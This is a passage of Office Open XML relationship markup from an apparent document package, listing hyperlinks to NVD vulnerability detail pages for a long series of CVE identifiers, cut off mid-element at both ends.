Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57449" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67408" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67419" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84465" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93365" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97589" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97608" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97931" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97953" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98041" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98150" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17545" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67226" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84461" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96875" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96876" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96877" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96878" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97846" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100584" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96448" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100192" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100501" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100531" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100538" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100582" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63432" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85274" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85289" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85291" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91767" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93899" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100529" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100546" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13179" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15273" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92746" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93656" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93747" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93897" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94376" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96766" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100177" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100190" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100556" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100577" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100591" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100592" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61837" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67223" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67225" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67230" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67242" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84463" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97863" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97886" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97895" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100521" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100522" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100523" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17577" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18312" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78393" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88996" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92212" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54790" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66071" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66073" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67411" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67412" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67413" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100574" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67222" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67227" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67415" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86066" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91766" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92842" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93477" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100547" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100569" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12037" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97877" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100303" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100388" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100524" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100528" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100549" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100550" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100563" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100593" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93366" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100526" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100545" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100548" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100571" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100572" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56728" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56732" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56735" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61855" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63006" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80514" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84460" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85290" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86837" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92799" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93364" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97864" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100174" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100373" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56726" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6087" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6088" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63205" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67407" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100502" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17602" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39372" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67241" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85292" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85293" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67406" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80430" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67421" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100525" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100553" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100583" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19775" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91769" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92829" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97469" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100554" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88848" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78394" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78397" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97896" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97897" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-1218" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100417" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100537" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100542" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97721" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100539" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65828" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67234" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67420" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92106" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96874" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56729" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66078" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97884" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100071" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100072" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100076" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86439" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88389" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97530" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97534" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97546" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97547" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97549" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97554" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97559" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97560" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97561" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 